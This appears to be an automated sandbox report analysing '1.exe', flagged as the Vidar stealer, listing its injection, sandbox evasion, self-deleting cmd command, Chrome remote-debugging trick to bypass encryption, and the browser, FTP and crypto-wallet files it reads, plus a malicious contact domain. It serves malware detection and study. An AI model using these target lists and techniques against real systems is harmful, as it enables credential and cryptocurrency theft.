Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe, 00000002.00000002.1893158406.000060E800D2C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=af705818-d91b-4b70-8498-38fc86d5b72d
Source: chrome.exe, 00000002.00000002.1891536486.000060E800AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: chrome.exe, 00000002.00000002.1895784682.000060E800FCC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse
Source: 1.exe, 00000001.00000002.2300803930.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1.exe, 00000000.00000002.1674577859.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1868859269.000002993AE3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CD696 lstrlen,GetProcessHeap,RtlAllocateHeap,lstrcpy,

1_2_009CD696

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\1.exe

Memory written: C:\Users\user\Desktop\1.exe base: 9C0000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CF0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

1_2_009CF0CA

Source: C:\Users\user\Desktop\1.exe	Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\1.exe" & rd /s /q "C:\ProgramData\va1vs" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: LocalAlloc,GetLocaleInfoA,LocalFree,

1_2_009CDE1C

Source: C:\Users\user\Desktop\1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\1.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009D7A56 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

1_2_009D7A56

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009D4CDB lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,

1_2_009D4CDB

Source: C:\Users\user\Desktop\1.exe

Code function: 1_2_009CDDBF GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_009CDDBF

Source: C:\Users\user\Desktop\1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7300, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.
Source: 1.exe, 00000001.00000002.2302254778.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: multidoge.wallet
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 1.exe, 00000001.00000002.2300803930.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\1.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\1.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\1.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: 1.exe PID: 7300, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\1.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.exe PID: 7300, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Create Account	211 Process Injection	11 Masquerading	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	1 Credentials in Registry	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	211 Process Injection	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	4 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	12 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	4 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	35 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1.exe	42%	Virustotal		Browse
1.exe	45%	ReversingLabs	Win32.Spyware.Vidar
1.exe	100%	Avira	TR/Dropper.Gen

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\va1vs\gvs0hv	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.0e0.jp.eu.org/	100%	Avira URL Cloud	malware
http://anglebug.com/6755V	0%	Avira URL Cloud	safe
https://www.0e0.jp.eu.orgK	0%	Avira URL Cloud	safe
http://anglebug.com/8229E	0%	Avira URL Cloud	safe
http://anglebug.com/4324?	0%	Avira URL Cloud	safe
http://anglebug.com/7724ty	0%	Avira URL Cloud	safe
http://anglebug.com/35863	0%	Avira URL Cloud	safe
https://www.0e0.jp.eu.org	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
plus.l.google.com	142.250.186.78	true	false	high
play.google.com	142.250.181.238	true	false	high
www.0e0.jp.eu.org	116.202.180.73	true	true	unknown
t.me	149.154.167.99	true	false	high
www.google.com	172.217.16.196	true	false	high
apis.google.com	unknown	unknown	false	high
171.39.242.20.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.0e0.jp.eu.org/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892115948.000060E800BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000002.00000002.1885457627.000060E8000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000002.00000002.1883280993.000060E80006C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000002.00000002.1891108568.000060E800A48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, uai5x4.1.dr	false		high
https://issuetracker.google.com/284462263	chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	false		high
https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly	chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889548993.000060E8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6755V	chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	false		high
